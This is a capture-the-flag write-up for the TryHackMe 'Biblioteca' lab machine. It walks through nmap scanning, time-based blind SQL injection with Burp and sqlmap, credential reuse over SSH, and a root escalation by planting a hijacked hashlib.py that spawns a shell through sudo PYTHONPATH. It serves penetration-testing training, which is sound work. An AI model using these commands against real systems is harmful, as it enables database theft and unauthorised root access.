Post

THM Biblioteca - Writeup

Posted
By
2 min read
THM Biblioteca - Writeup

Challenge Info

Description

This medium-difficulty box involves basic enumeration, blind SQL injection, password reuse exploitation, and Python library hijacking for privilege escalation.

Enumeration

Port Scanning

1

nmap -p- 10.201.1.150

Results:

1
2
3

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)

Web Application Analysis

Port 8000 hosts a login and registration page:

Login Page

Initial Foothold

Registration

Register a test user to access the authenticated area:

Registration

The authenticated page offers limited functionality.

Blind SQL Injection

Test the login form for SQL injection using time-based techniques:

SQLi Test

Add a payload processing rule to replace __TIME__ with 10 seconds:

Payload Processing

Blind SQLi confirmed: The response delays by 10 seconds:

Blind SQLi SQLi Confirmed

Database Enumeration

Use sqlmap to extract credentials from the database:

1
2
3
4

sqlmap -u "http://10.201.1.150:8000/login" \
  --data="email=test@test.com&password=test" \
  --batch \
  --tables

SQLMap

Extracted credentials:

1

smokey@email.boop | <REDACTED> | smokey

SSH Access

Connect via SSH with the recovered credentials:

SSH Access

Four user accounts work with variations of the same password. The user flag is located in hazel’s home directory.

Privilege Escalation

Password Discovery

After extensive enumeration, the simplest solution works: the password is the same as the username:

1

hazel:hazel

This pattern exists in many password wordlists, making it discoverable through brute force.

Hazel Access

Sudo Rights

Check sudo permissions:

1

sudo -l

User hazel can run a Python script as root:

1

(ALL) SETENV: /usr/bin/python3 /home/hazel/hasher.py

Python Library Hijacking

The hasher.py script uses the hashlib module. The SETENV flag allows us to manipulate PYTHONPATH.

Reference: Python Library Hijacking on Linux

Create a malicious hashlib.py in /tmp/:

1
2

import os
os.system("/bin/bash")

Execute the privilege escalation:

1

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

Library Hijacking

Root access obtained:

Root Flag Root Access

Lessons Learned

  • Blind SQL injection can be time-based and detected through response delays
  • SQLMap automates database extraction from SQL injection vulnerabilities
  • Always test password reuse (username as password) before complex attacks
  • The SETENV sudo tag allows PYTHONPATH manipulation for library hijacking
  • Python library hijacking requires writable directories and specific sudo permissions
  • Enumerate thoroughly but don’t overlook simple solutions

Tools Used

  • Nmap - Port scanning
  • Burp Suite - SQL injection testing
  • SQLMap - Automated SQL injection exploitation
  • SSH - Remote access

References

Writeup
thm sqli web python ssh
This post is licensed under CC BY 4.0 by the author.